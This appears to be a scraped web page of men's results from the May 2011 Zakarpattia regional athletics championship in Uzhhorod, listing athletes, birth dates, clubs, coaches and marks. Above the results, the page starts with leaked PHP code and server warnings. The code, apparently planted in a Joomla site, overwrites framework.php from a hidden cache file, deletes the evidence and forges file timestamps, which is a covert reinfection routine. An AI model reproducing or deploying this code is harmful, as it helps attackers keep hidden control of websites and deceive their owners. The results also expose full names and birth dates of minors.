$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Чемпіонат Закарпатської області 2011 чоловіки | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА
Чемпіонат Закарпатської області 2011 чоловіки | Друкувати |

 


Чемпіонат Закарпатської області з легкої атлетики

7-8 травня 2011 р.     м. Ужгород    Стадіон "Авангард"




Ужгород 7 травня 2011 11:25

Біг на 100 м Чоловіки  Фінал                                    

Забіг 1                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    39    ГАБУРАЙ Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    11.07.1994    0.0    11.8h        III    Дуда В.Л. ()

2    66    КРАСІЦКИЙ Андрій    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    01.01.1994    0.0    11.8h        III    Горват Т.В. ()

3    52    БЕТЛЯНИН Олександр    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    09.07.1995    0.0    12.2h        I юнацький    Новікова Н.Є., Мокринський М.М.

4    13    ПОНІТЦ Едвард    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    10.10.1995    0.0    12.4h        I юнацький    Цоклан Й.В. ()

5    82    ГЕБЕШ Володимир    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    21.11.1994    0.0    12.7h        II юнацький    Горват Т.В. ()

109    БАНЯС Михайло    UKR, Закарпатська, Хустський р-н, ДЮСШ Хустського р-ну    15.05.1994    0.0    DQ            

Забіг 2                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    53    БІЛЕЙ Євген    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    25.01.1995    0.0    11.2h        II    Коломоєць А.І., Новікова Н.Є.

2    77    ПОНЗЕЛЬ Едуард    UKR, Закарпатська, Свалявський р-н    13.06.1989    0.0    11.7h        III    Головнич О.М. ()

3    224    МОКАН Іван    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    14.10.1993    0.0    11.9h        III    Гусар В.М., Гусар В.В. ()

4    51    ЗІНЧЕНКО Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    18.02.1995    0.0    12.1h        I юнацький    Дуда В.Л. ()

5    101    КАМПОВ Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    12.06.1993    0.0    12.4h        I юнацький    Дуда В.Л. ()

6    56    ГЕРЕЙ Максим    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    16.09.1996    0.0    12.6h        II юнацький    Панкулич І.В.

Забіг 3                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    57    ЙОВБАК Дмтиро    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    31.01.1995    0.0    11.7h        III    Коломоєць А.І., Новікова Н.Є.

2    107    САВИНЕЦЬ Андрій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    23.01.1997    0.0    12.1h        I юнацький    Аврамченко В.А.

3    389    РОМАНЮК Микола    UKR, Закарпатська, Рахівський р-н, МОН, ДЮСШ Рахівського р-ну    09.01.1994    0.0    12.2h        I юнацький    Катеренюк В.П. ()

4    178    МУРАЙКО Іван    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    06.04.1996    0.0    12.3h        I юнацький    Цоклан Й.В. ()

5    388    ЯЦЮК Олександр    UKR, Закарпатська, Рахівський р-н    07.01.1994    0.0    12.5h        I юнацький    Катеренюк В.П. ()

6    53    ДАНИЛО Дмитро    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    28.10.1994    0.0    12.7h        II юнацький    Дуда В.Л. ()

78    ІВАШКОВИЧ Ерік    UKR, Закарпатська, Свалявський р-н, ДЮСШ Свалявського р-ну    30.12.1994    0.0    DNS            Загарій В.І. ()

Забіг 4                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    238    ТОПОРКОВ Сергій    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    26.11.1989    0.0    10.9h        I    Андреасова Л.В.

2    58    ХАРЧУК Олег    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    28.01.1993    0.0    11.3h        II    Калита Т.В.

3        ФАРИНИЧ Олександр    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    15.12.1992    0.0    11.5h        II    Панкулич І.В.



Ужгород 8 травня 2011 09:50

Біг на 200 м Чоловіки  Фінал                                    

Забіг 1                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    39    ГАБУРАЙ Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    11.07.1994    0.0    25.4h        III    Дуда В.Л. ()

2    388    ЯЦЮК Олександр    UKR, Закарпатська, Рахівський р-н    07.01.1994    0.0    26.2h        I юнацький    Катеренюк В.П. ()

3    58    САКАЛЬ Олександр    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    02.02.1995    0.0    26.5h        I юнацький    Дуда В.Л. ()

4    101    КАМПОВ Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    12.06.1993    0.0    29.1h            Дуда В.Л. ()

51    ЗІНЧЕНКО Василь    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    18.02.1995    0.0    DNS            Дуда В.Л. ()

53    ДАНИЛО Дмитро    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    28.10.1994    0.0    DNS            Дуда В.Л. ()

Забіг 2                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    224    МОКАН Іван    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    14.10.1993    0.0    24.8h        III    Гусар В.М., Гусар В.В. ()

2    389    РОМАНЮК Микола    UKR, Закарпатська, Рахівський р-н, МОН, ДЮСШ Рахівського р-ну    09.01.1994    0.0    25.4h        III    Катеренюк В.П. ()

3    78    ІВАШКОВИЧ Ерік    UKR, Закарпатська, Свалявський р-н, ДЮСШ Свалявського р-ну    30.12.1994    0.0    25.6h        I юнацький    Загарій В.І. ()

82    ГЕБЕШ Володимир    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    21.11.1994    0.0    DNS            Горват Т.В. ()

272    ЧОРЕЙ Владислав    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    01.01.1995    0.0    DNS            Гусар В.М., Гусар В.В. ()

Забіг 3                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    67    ПОПОВИЧ Іван    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    25.12.1994    0.0    24.0h        III    Горват Т.В. ()

2    57    ЙОВБАК Дмтиро    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    31.01.1995    0.0    24.2h        III    Коломоєць А.І., Новікова Н.Є.

3    66    КРАСІЦКИЙ Андрій    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    01.01.1994    0.0    24.7h        III    Горват Т.В. ()

4    109    БАНЯС Михайло    UKR, Закарпатська, Хустський р-н, ДЮСШ Хустського р-ну    15.05.1994    0.0    24.9h        III    

5    178    МУРАЙКО Іван    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    06.04.1996    0.0    25.1h        III    Цоклан Й.В. ()

6    107    САВИНЕЦЬ Андрій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    23.01.1997    0.0    25.8h        I юнацький    Аврамченко В.А.

Забіг 4                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    53    БІЛЕЙ Євген    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    25.01.1995    0.0    23.1h        II    Коломоєць А.І., Новікова Н.Є.

2    13    ПОНІТЦ Едвард    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    10.10.1995    0.0    25.5h        III    Цоклан Й.В. ()

3    7    ЛОПАТІН Ярослав    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    26.03.1995    0.0    25.8h        I юнацький    Цоклан Й.В. ()

52    БЕТЛЯНИН Олександр    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    09.07.1995    0.0    DNS            Новікова Н.Є., Мокринський М.М.

56    ГЕРЕЙ Максим    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    16.09.1996    0.0    DNS            Панкулич І.В.

Забіг 5                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    58    ХАРЧУК Олег    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    28.01.1993    0.0    23.8h        III    Калита Т.В.

2    68    МАРТИНЮК Роман    UKR, Закарпатська, Ужгород, Д    06.12.1991    0.0    24.2h        III    Коломоєць А.І.

3    59    ГАЗУДА Євген    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    22.01.1991    0.0    24.8h        III    Коломоєць А.І.

4        ФАРИНИЧ Олександр    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    15.12.1992    0.0    25.7h        I юнацький    Панкулич І.В.

67    КОМАР Андрій    UKR, Закарпатська, Ужгород, Д    21.07.1985    0.0    DNS            Коломоєць А.І.





Ужгород 7 травня 2011 16:00

Біг на 400 м Чоловіки  Фінал                                    

Забіг 1                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    34    ЯЦЕНКО Сергій    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    08.12.1994    57.0h        I юнацький    Дуда В.Л. ()    

2    7    ЛОПАТІН Ярослав    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    26.03.1995    57.8h        I юнацький    Цоклан Й.В. ()    

3    6    МАРКУЛІН Давід    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    09.07.1995    1:01.5h        II юнацький    Цоклан Й.В. (), Панкулич І.В.    

ШИПОВ Олександр    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    17.04.1993    DNS            Головнич О.М. ()    

Забіг 2                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    74    КУПАР Андрій    UKR, Закарпатська, Ужгород, Д    09.06.1985    53.1h        II    Мокринський М.М.    

2    67    ПОПОВИЧ Іван    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    25.12.1994    55.0h        III    Горват Т.В. ()    

3    59    ГАЗУДА Євген    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    22.01.1991    55.6h        III    Коломоєць А.І.    

4    250    ШКІРЕЙ  Мілан    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    27.02.1995    59.7h        II юнацький    Панкулич І.В.    

5    93    ЛЕВКО Михайло    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    19.11.1996    59.8h        II юнацький    Гусар В.М., Гусар В.В. ()    





Ужгород 8 травня 2011 11:00

Біг на 800 м Чоловіки  Фінал                                    

Забіг 1                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    74    КУПАР Андрій    UKR, Закарпатська, Ужгород, Д    09.06.1985    1:56.3h        I    Мокринський М.М.    

2    63    КОВАЧ Федір    UKR, Закарпатська, Ужгород    22.12.1987    2:01.5h        II    Мокринський М.М.    

3    71    ШИКУЛА Михайло    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    18.11.1992    2:06.1h        II    Мокринський М.М.    

4    225    НОВОШЕВСЬКИЙ Олег    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    30.10.1993    2:06.2h        II    Гусар В.М., Гусар В.В. ()    

5    73    ІВАНОВ Андрій    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    23.03.1992    2:08.0h        II    Мокринський М.М.    

6    65    ЦІЛЬО Андрій    UKR, Закарпатська, Ужгород, МОН    09.06.1992    2:10.4h        III    Маріонда І.І. ()    

7    72    МИТРОВКА Максим    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    25.11.1993    2:11.0h        III    Мокринський М.М.    

8    64    ТАЛАБІРА Роберт    UKR, Закарпатська, Ужгород    08.04.1987    2:11.8h        III    Мокринський М.М.    

9        ШИПОВ Олександр    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    17.04.1993    2:22.1h        I юнацький    Головнич О.М. ()    

68    ЛЕБОВИЧ Юрій    UKR, Закарпатська, Свалявський р-н    16.04.1991    DNS            Головнич О.М. ()    

390    КОКІШ Іван    UKR, Закарпатська, Рахівський р-н    16.12.1993    DNS            Катеренюк В.П. ()    

Забіг 2                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    15    МАНГУР Іван    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    06.03.1994    2:07.9h        II    Дуда В.Л. ()    

2    272    АВДЄЄВ Веніамін    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    18.12.1994    2:14.0h        III    Гусар В.М., Гусар В.В. ()    

3    154    КРИВСЬКИЙ Олександр    UKR, Закарпатська, Хустський р-н, МОН, ДЮСШ Хустського р-ну    09.01.1994    2:14.4h        III        

4    250    ШКІРЕЙ  Мілан    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    27.02.1995    2:16.9h        III    Панкулич І.В.    

5    93    ЛЕВКО Михайло    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    19.11.1996    2:17.0h        III    Гусар В.М., Гусар В.В. ()    

6    34    ЯЦЕНКО Сергій    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    08.12.1994    2:22.2h        I юнацький    Дуда В.Л. ()    

7    6    МАРКУЛІН Давід    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    09.07.1995    2:25.1h        I юнацький    Цоклан Й.В. (), Панкулич І.В.    

85    БОЧКО Владислав    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    31.01.1994    DQ            Головнич О.М. ()    

2    ЮРТИН Олександр    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    18.06.1994    DNS            Головнич О.М. ()    

73    КІМІРІН Кирило    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    20.01.1994    DNS            Дуда В.Л. ()    

260    СЕМИГАЛ Сергій    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    17.04.1996    DNS            Панкулич І.В.    




Ужгород 7 травня 2011 16:30

Біг на 1500 м Чоловіки  Фінал                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    71    ШИКУЛА Михайло    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    18.11.1992    4:16.2h        II    Мокринський М.М.    

2    788    РАСЧУПКІН Сергій    UKR, Закарпатська, Мукачівський р-н, К    18.05.1990    4:18.7h        II    Дуда В.Л. ()    

3    225    НОВОШЕВСЬКИЙ Олег    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    30.10.1993    4:20.5h        II    Гусар В.М., Гусар В.В. ()    

4    73    ІВАНОВ Андрій    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    23.03.1992    4:20.7h        II    Мокринський М.М.    

5    15    МАНГУР Іван    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    06.03.1994    4:23.7h        II    Дуда В.Л. ()    

6    95    ТЕРНАВСЬКИЙ Василь    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    01.01.1992    4:27.8h        III    Гусар В.М., Гусар В.В. ()    

7    390    КОКІШ Іван    UKR, Закарпатська, Рахівський р-н    16.12.1993    4:30.7h        III    Катеренюк В.П. ()    

8    72    МИТРОВКА Максим    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    25.11.1993    4:35.1h        III    Мокринський М.М.    

9    65    ЦІЛЬО Андрій    UKR, Закарпатська, Ужгород, МОН    09.06.1992    4:38.0h        III    Маріонда І.І. ()    

10    272    АВДЄЄВ Веніамін    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    18.12.1994    4:38.5h        III    Гусар В.М., Гусар В.В. ()    

11    53    ФЕГЕР Янош    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    02.06.1994    4:41.0h        III    Дуда В.Л. ()    

12    68    ЛЕБОВИЧ Юрій    UKR, Закарпатська, Свалявський р-н    16.04.1991    4:48.5h        III    Головнич О.М. ()    

13    73    КІМІРІН Кирило    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    20.01.1994    4:55.7h        I юнацький    Дуда В.Л. ()    

2    ЮРТИН Олександр    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    18.06.1994    DNS            Головнич О.М. ()    

85    БОЧКО Владислав    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    31.01.1994    DNS            Головнич О.М. ()    

154    КРИВСЬКИЙ Олександр    UKR, Закарпатська, Хустський р-н, МОН, ДЮСШ Хустського р-ну    09.01.1994    DNS                

387    БІЛОСЮК Мирослав    UKR, Закарпатська, Рахівський р-н, С    29.07.1985    DNS            Катеренюк В.П. ()    




Ужгород 8 травня 2011 11:15

Біг на 5000 м Чоловіки  Фінал                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    60    ГАВРИЛЮК Роман    UKR, Закарпатська, Д    18.07.1982    15:26.7h        II    Маріонда І.І. (), Дністрян В.А. ()    

2    788    РАСЧУПКІН Сергій    UKR, Закарпатська, Мукачівський р-н, К    18.05.1990    16:48.7h        III    Дуда В.Л. ()    

3    95    ТЕРНАВСЬКИЙ Василь    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    01.01.1992    17:10.2h        III    Гусар В.М., Гусар В.В. ()    

4    386    БІЛОСЮК Іван    UKR, Закарпатська, Рахівський р-н, С    18.01.1984    18:01.3h        I юнацький    Катеренюк В.П. ()    

53    ФЕГЕР Янош    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    02.06.1994    DNS            Дуда В.Л. ()    

56    ГОПАК Едуард    UKR, Закарпатська, Ужгород, МОН    02.08.1983    DNS            Кузін О    






Ужгород 7 травня 2011 11:40

Біг на 110 м з/б (1.067) Чоловіки  Фінал                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Вітер    Результат        Розряд    Тренери

1    67    КОМАР Андрій    UKR, Закарпатська, Ужгород, Д    21.07.1985    0.0    14.2h        МС    Коломоєць А.І. рекорд області

2    68    МАРТИНЮК Роман    UKR, Закарпатська, Ужгород, Д    06.12.1991    0.0    14.8h        КМС    Коломоєць А.І.




Ужгород 7 травня 2011 17:00

Естафетний біг 4х100 м Чоловіки  Фінал                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1        КОМАР Андрій    UKR, Закарпатська, Ужгород, Д    21.07.1985    44.9h        III    Коломоєць А.І.    

1        МАРТИНЮК Роман    UKR, Закарпатська, Ужгород, Д    06.12.1991    44.9h        III    Коломоєць А.І.    

1        ХАРЧУК Олег    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    28.01.1993    44.9h        III    Калита Т.В.    

1    53    БІЛЕЙ Євген    UKR, Закарпатська, Ужгород, МОН, ДЮСШ №1 м. Ужгород    25.01.1995    44.9h        III    Коломоєць А.І., Новікова Н.Є.    

2        КРАСІЦКИЙ Андрій    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    01.01.1994    48.9h        I юнацький    Горват Т.В. ()    

2        ІВАШКОВИЧ Ерік    UKR, Закарпатська, Свалявський р-н, ДЮСШ Свалявського р-ну    30.12.1994    48.9h        I юнацький    Загарій В.І. ()    

2        ПОНЗЕЛЬ Едуард    UKR, Закарпатська, Свалявський р-н    13.06.1989    48.9h        I юнацький    Головнич О.М. ()    

2        ПОПОВИЧ Іван    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    25.12.1994    48.9h        I юнацький    Горват Т.В. ()    



Ужгород 7 травня 2011 16:35

Стрибки у довжину Чоловіки  Фінал                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1    239    ГАЗДА Імре    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    15.02.1990    6.69        РB    II    Аврамченко В.А.
6.00    6.48    6.69    X    6.30    X
0.0    0.0    0.0        0.0    

2    240    ІЛЯШКО Ярослав    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    12.02.1993    6.21        РB    III    Аврамченко В.А.
X    X    6.21    X        
0.0        0.0    0.0

3    57    МАТЯШ Едуард    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    03.09.1985    6.20        РB    III    Балога Д.М. ()
X    X    6.20    X    X    6.02
0.0            0.0

4    196    МЕЛЬНИК Максим    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    12.01.1997    5.77        РB    I юнацький    Панкулич І.С., Панкулич І.В.
5.77    5.49    X    5.40        
0.0    0.0        0.0    0.0    0.0

5    103    ЄВРЕШ Едгар    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    28.08.1995    5.73        РB    I юнацький    Аврамченко В.А.
5.61    5.50    X    5.65    5.73    X
0.0    0.0        0.0    0.0    

6    102    ЦОНИНЕЦЬ Сергій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    12.01.1995    5.68        РB    I юнацький    Аврамченко В.А.
X    5.68    5.50    5.41    5.54    5.68
0.0    0.0    0.0    0.0    0.0

7    104    КОРОЛЬОВ Олег    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    06.09.1996    5.39        РB    I юнацький    Аврамченко В.А.
X    X    5.39    X    5.18    X
0.0        0.0    

8    273    ГУСАР Віктор    UKR, Закарпатська, Тячівський р-н, МОН    20.06.1989    5.15        РB    II юнацький    Гусар В.М.
5.15    X    4.50    X        
0.0        0.0        0.0    0.0

9    100    ГУСАР Андрій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    17.10.1997    5.10        РB    II юнацький    Гусар В.М., Гусар В.В. ()
4.57    5.10    X            
0.0    0.0                

10    93    МАЦОЛА Ерік    UKR, Закарпатська, Тячівський р-н    13.01.1997    4.35        РB    III юнацький    Гусар В.М., Гусар В.В. ()
4.35    X    X            
0.0                    

95    ДОРОФЕЄВ Роман    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    27.01.1995    NM                Гусар В.М., Гусар В.В. ()
X    X    X            


261    ТОВТИН Віталій    UKR, Закарпатська, Мукачево, МОН, МДУ    25.05.1989    NM                Панкулич І.С.
X    X    X            





Ужгород 8 травня 2011 10:45

Потрійний стрибок Чоловіки  Фінал                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1    240    ІЛЯШКО Ярослав    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    12.02.1993    14.41        РB    I    Аврамченко В.А.
13.95    X    X    14.41    X    14.30
0.0            0.0        0.0

2    57    МАТЯШ Едуард    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    03.09.1985    13.86        РB    II    Балога Д.М. ()
13.86    13.09    13.17    X    X    13.20
0.0    0.0    0.0            0.0

3    103    ЄВРЕШ Едгар    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    28.08.1995    13.28        РB    III    Аврамченко В.А.
13.12    12.95    12.50    12.50    12.58    13.28
0.0    0.0    0.0    0.0    0.0    0.0

4    102    ЦОНИНЕЦЬ Сергій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    12.01.1995    13.06        РB    III    Аврамченко В.А.
11.56    12.53    12.49    X    12.42    13.06
0.0    0.0    0.0        0.0    0.0

5    104    КОРОЛЬОВ Олег    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    06.09.1996    12.26        РB    III    Аврамченко В.А.
11.20    X    X    12.26    X    12.05
0.0            0.0        0.0

6    100    ГУСАР Андрій    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    17.10.1997    11.32        РB    II юнацький    Гусар В.М., Гусар В.В. ()
X    X    10.75    11.25    X    11.32
0.0    0.0        0.0

93    МАЦОЛА Ерік    UKR, Закарпатська, Тячівський р-н    13.01.1997    NM                Гусар В.М., Гусар В.В. ()
X    X    X            


261    ТОВТИН Віталій    UKR, Закарпатська, Мукачево, МОН, МДУ    25.05.1989    NM                Панкулич І.С.
X    X    X    X    X    X


239    ГАЗДА Імре    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    15.02.1990    DNS                Аврамченко В.А.







Ужгород 7 травня 2011 16:05

Штовхання ядра 7,260 кг Чоловіки  Фінал                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1    56    ПУПЕНА Володимир    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    11.09.1984    13.00    700    РB    II    Балога Д.М. ()
13.00    11.88    12.68            

2    80    СИНЬКО Михайло    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    22.10.1991    9.87    514    РB    III    Горват Т.В. ()
9.41    9.87    9.26            

3    81    ТКАЧУК Віктор    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    14.11.1991    9.36    484    РB    III    Горват Т.В. ()
X    9.12    9.36            

4    58    САКАЛЬ Олександр    UKR, Закарпатська, Мукачівський р-н, К  , ДЮСШ "Колос" Мукачівського р-ну    02.02.1995    7.14    352    РB        Дуда В.Л. ()
X    6.58    7.14            

58    ОНИСЬКО Михайло    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    11.09.1984    DNS                Балога Д.М. ()


386    БІЛОСЮК Іван    UKR, Закарпатська, Рахівський р-н, С    18.01.1984    DNS                Катеренюк В.П. ()






Ужгород 7 травня 2011 15:00

Метання диска 2 кг Чоловіки  Фінал                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1    56    ПУПЕНА Володимир    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    11.09.1984    45.58    778    РB    I    Балога Д.М. ()
X    44.84    45.58    44.80    42.97    43.40

2    81    ТКАЧУК Віктор    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    14.11.1991    30.90    504    РB    III    Горват Т.В. ()
25.87    X    28.67    29.40    29.86    30.90

3    69    ДУДАШ Віталій    UKR, Закарпатська, Свалявський р-н    22.07.1984    30.80    502    РB    III    Загарій В.І. ()
X    25.98    X    X    X    30.80

